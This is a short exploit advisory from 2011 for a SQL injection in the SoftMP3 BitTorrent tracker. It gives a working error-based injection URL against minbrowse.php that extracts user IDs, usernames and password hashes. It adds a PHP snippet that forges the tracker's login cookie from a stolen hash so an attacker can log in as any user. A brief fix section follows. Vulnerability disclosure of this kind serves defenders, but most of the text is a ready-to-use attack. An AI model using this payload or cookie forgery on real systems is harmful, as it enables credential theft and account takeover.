ExploitFixes
SoftMP3 SQL Injection Vulnerability 2011-04-24 16:15:03

# Exploit Title: SOFTMP3 source code SQL injection
# Date: 23/04/2011
# Author: mArTi
# Software Link: http://softmp3.org/
# Version: No others versions available...
# Tested on: Windows / Unix

/.................................../ Introduction /.................................../

SoftMP3 released a source code of its bittorent tracker when it died. This source code is vulnerable to a SQL injection.
Here's the PoC and the Fix

/.................................../ PoC /.................................../

-> SQL http://localhost/SOFTMP3/minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"

-----> Then you can use this to connect as the user you want by the passhash you got and setting the following cookies :

uid=id
pass=encrypted passhash (see down)


---------> getting encrypted passhash to connect with the cookies
<?php
$test=md5($HTTP_SERVER_VARS["REMOTE_ADDR"]."passhash"."hejsan".$HTTP_SERVER_VARS["REMOTE_ADDR"]);
echo "pass cookie is $test"
?>

/.................................../ FIX /.................................../

Delete /minbrowse.php (useless).

BTW, if you want to protect the cookies, just change the cookie encryption in bittorent.php file (like the "hejsan" key or the order of terms in encryption)



-------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------
Protect yourself against the security breaks in your security to protect your users and your site. If you want to contact me, you'll know where to find me.
-------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------